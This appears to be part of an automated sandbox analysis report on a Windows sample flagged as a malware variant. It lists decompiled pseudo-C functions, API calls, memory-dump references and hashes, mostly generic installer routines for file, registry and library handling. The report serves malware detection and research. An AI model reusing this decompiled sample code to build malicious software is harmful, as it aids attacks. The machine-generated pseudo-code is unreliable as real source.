0x00401bb1
0x00401bb5
0x00000000
0x00401bb7
0x00401bb9
0x00000000
0x00401bbf
0x00401bbf
0x00401bc2
0x00401bc9
0x00401bce
0x00401bd8
0x00401bdd
0x00401be2
0x00401be6
0x00402a94
0x00402c2a
0x00402c2d
0x00402c33
0x00402c33
0x00401bb9
0x00000000
0x00401bb5
0x0040238a
0x00402397
0x00402398
0x0040239d
0x0040239d
0x00402c35
0x00402c39

APIs

GlobalFree.KERNEL32(00000000), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call
API String ID: 3292104215-1824292864
Opcode ID: 30569e39da44555291961ad64853d198300d6f9ab86d75038d444cc6ad9f290b
Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
Opcode Fuzzy Hash: 30569e39da44555291961ad64853d198300d6f9ab86d75038d444cc6ad9f290b
Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004022FF Relevance: 4.6, APIs: 3, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004022FF(void* __eflags) {
				WCHAR* _t34;
				WCHAR* _t37;
				WCHAR* _t39;
				void* _t41;

				_t39 = E00402DA6(_t34);
				_t37 = E00402DA6(0x11);
				 *((intOrPtr*)(_t41 + 8)) = E00402DA6(0x23);
				if(E00406873(_t39) != 0) {
					 *(_t41 - 0x70) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x6c)) = 2;
					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
					_t27 =  *((intOrPtr*)(_t41 + 8));
					 *(_t41 - 0x68) = _t39;
					 *(_t41 - 0x64) = _t37;
					 *((intOrPtr*)(_t41 - 0x56)) =  *((intOrPtr*)(_t41 + 8));
					 *((short*)(_t41 - 0x60)) =  *((intOrPtr*)(_t41 - 0x28));
					E0040559F(_t34, _t27);
					if(SHFileOperationW(_t41 - 0x70) != 0) {
						goto L1;
					}
				} else {
					L1:
					E0040559F(0xfffffff9, _t34); // executed
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}

0x00402307
0x00402310
0x00402318
0x00402322
0x00402335
0x00402338
0x00402345
0x0040234f
0x00402354
0x0040235d
0x00402360
0x00402363
0x00402366
0x0040236a
0x0040237b
0x00000000
0x00402381
0x00402324
0x00402324
0x00402327
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

Part of subcall function 00406873: FindFirstFileW.KERNELBASE(75AF3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
Part of subcall function 00406873: FindClose.KERNEL32(00000000), ref: 0040688A

lstrlenW.KERNEL32 ref: 0040233F
lstrlenW.KERNEL32(00000000), ref: 0040234A
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: b1fc6ebd14e20afbf3d9adb2b12d8468a4ef83371132ba700f4899ad32413557
Instruction ID: 04a4b26c59b21466d08f766bca7c88c70db01468de87939535198cd3568d8cbb
Opcode Fuzzy Hash: b1fc6ebd14e20afbf3d9adb2b12d8468a4ef83371132ba700f4899ad32413557
Instruction Fuzzy Hash: 40115A71D00314AADB10EFBAD949A9EB6B8AF04354F10843BA405FB2C1E6BCC9408B59

Uniqueness

Uniqueness Score: -1.00%

Function 02AD2A89 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Strings

?, xrefs: 02AD2AD5

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ?
API String ID: 1029625771-1684325040
Opcode ID: b7d50186bd7f9c119a5920ca895b3613a055e274bac28c2f0d01e77ab6c5d270
Instruction ID: 4b9e4401d14134ae210e5b7fa96c6eb4b540eaa12224474db257589013c062b9
Opcode Fuzzy Hash: b7d50186bd7f9c119a5920ca895b3613a055e274bac28c2f0d01e77ab6c5d270
Instruction Fuzzy Hash: B4712675A00346DFDF31AF2889967DA37A2EF55360FE4407EDC4A8B216DB318985CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402434(void* __ebx) {
				long _t7;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t22 = E00402DE6(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402434
0x00402434
0x00402437
0x0040243a
0x00402476
0x0040247b
0x00000000
0x0040243c
0x00402443
0x00402447
0x0040292e
0x0040292e
0x0040244d
0x0040245d
0x0040245f
0x0040247d
0x0040247f
0x00000000
0x00402485
0x0040247f
0x00402447
0x00402c2d
0x00402c39

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 26c7bbe08243d04bc546d5e796cf8e3d3467160ca4cc8197957f0192bba27813
Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
Opcode Fuzzy Hash: 26c7bbe08243d04bc546d5e796cf8e3d3467160ca4cc8197957f0192bba27813
Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x0040600d
0x00406013
0x00406018
0x00406021
0x00406021
0x0040602a

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 02AC072F Relevance: 1.7, APIs: 1, Instructions: 206libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3cc196289f2b753a50570f99e177d665517522efdd8fa0779b5609fc6207d9ff
Instruction ID: b795e0ac49b2375702ad7c8c35fe6d508038a2c3c1f3280272bbd3abc7f128fb
Opcode Fuzzy Hash: 3cc196289f2b753a50570f99e177d665517522efdd8fa0779b5609fc6207d9ff
Instruction Fuzzy Hash: 87615770B00707DFDF249F7899E47EA33A3AF567A0F88816ADC864B151DB358585CB02

Uniqueness

Uniqueness Score: -1.00%

Function 70B22B98 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E70B22B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x70b25050 != 0 && E70B22ADB(_a4) == 0) {
					 *0x70b25054 = _t93;
					if( *0x70b2504c != 0) {
						_t93 =  *0x70b2504c;
					} else {
						E70B230C0(E70B22AD5(), __ecx);
						 *0x70b2504c = _t93;
					}
				}
				_t28 = E70B22B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E70B22AFD();
					_t72 = _a4;
					_t79 =  *0x70b25058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x70b25058 = _t72;
					E70B22AF7();
					_t33 = EnumWindows(??, ??); // executed
					 *0x70b25034 = _t33;
					 *0x70b25038 = _t79;
					if( *0x70b25050 != 0 && E70B22ADB( *0x70b25058) == 0) {
						 *0x70b2504c = _t94;
						_t94 =  *0x70b25054;
					}
					_t80 =  *0x70b25058;
					_a4 = _t80;
					 *0x70b25058 =  *((intOrPtr*)(E70B22AFD() + _t80));
					_t37 = E70B22AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E70B22B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E70B22B14() + _a4 + _v8);
							_push(E70B22B1E());
							if( *0x70b25050 <= 0 || E70B22ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x70b2504c =  *0x70b2504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x70b25058;
					if( *0x70b25058 == 0) {
						 *0x70b2504c = 0;
					}
					E70B22B42(_t107, _a4,  *0x70b25034,  *0x70b25038);
					return _a4;
				}
				_push(E70B22B14() + _a4);
				_t56 = E70B22B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E70B22B26();
				_t87 = E70B22B22();
				_t90 = E70B22B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x70b22ba8
0x70b22bb9
0x70b22bc6
0x70b22bda
0x70b22bc8
0x70b22bcd
0x70b22bd2
0x70b22bd2
0x70b22bc6
0x70b22be3
0x70b22be8
0x70b22bee
0x70b22c32
0x70b22c32
0x70b22c37
0x70b22c3c
0x70b22c42
0x70b22c44
0x70b22c4a
0x70b22c57
0x70b22c59
0x70b22c5e
0x70b22c6b
0x70b22c7e
0x70b22c84
0x70b22c8a
0x70b22c8b
0x70b22c91
0x70b22c9d
0x70b22ca3
0x70b22cab
0x70b22cac
0x70b22caf
0x70b22cba
0x70b22cbc
0x70b22cc8
0x70b22cce
0x70b22cd6
0x70b22d02
0x70b22d03
0x70b22d05
0x70b22d09
0x70b22d09
0x70b22d10
0x70b22ce6
0x70b22ce6
0x70b22ce7
0x70b22cf5
0x70b22cfe
0x70b22cfe
0x70b22cd6
0x70b22cba
0x70b22d12
0x70b22d19
0x70b22d1b
0x70b22d1b
0x70b22d34
0x70b22d42
0x70b22d42
0x70b22bf9
0x70b22bfa
0x70b22bff
0x70b22c03
0x70b22c08
0x70b22c1c
0x70b22c1d
0x70b22c1e
0x70b22c20
0x70b22c25
0x70b22c27
0x70b22c27
0x70b22c2a
0x70b22c30
0x00000000

APIs

EnumWindows.USER32(00000000), ref: 70B22C57

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

